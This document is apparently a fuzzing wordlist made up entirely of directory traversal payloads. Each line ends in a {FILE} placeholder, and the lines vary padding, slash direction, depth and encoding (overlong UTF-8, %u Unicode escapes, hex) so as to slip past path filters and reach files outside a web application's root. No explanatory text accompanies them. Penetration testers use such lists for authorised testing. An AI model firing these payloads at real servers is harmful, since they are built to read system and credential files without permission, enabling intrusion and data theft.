AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.../{FILE}&lt;br /&gt;
.../.../{FILE}&lt;br /&gt;
.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
.../.../.../.../.../.../.../.../{FILE}&lt;br /&gt;
...\{FILE}&lt;br /&gt;
...\...\{FILE}&lt;br /&gt;
...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
...\...\...\...\...\...\...\...\{FILE}&lt;br /&gt;
..../{FILE}&lt;br /&gt;
..../..../{FILE}&lt;br /&gt;
..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
..../..../..../..../..../..../..../..../{FILE}&lt;br /&gt;
....\{FILE}&lt;br /&gt;
....\....\{FILE}&lt;br /&gt;
....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
....\....\....\....\....\....\....\....\{FILE}&lt;br /&gt;
........................................................................../{FILE}&lt;br /&gt;
........................................................................../../{FILE}&lt;br /&gt;
........................................................................../../../{FILE}&lt;br /&gt;
........................................................................../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../{FILE}&lt;br /&gt;
........................................................................../../../../../../../../{FILE}&lt;br /&gt;
..........................................................................\{FILE}&lt;br /&gt;
..........................................................................\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..........................................................................\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}&lt;br /&gt;
..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}&lt;br /&gt;
..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}&lt;br /&gt;
..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}&lt;br /&gt;
%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}&lt;br /&gt;
..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}&lt;br /&gt;
0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}&lt;br /&gt;
0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}&lt;br /&gt;
..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}&lt;br /&gt;
0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}&lt;br /&gt;
0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}&lt;br /&gt;
..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}&lt;br /&gt;
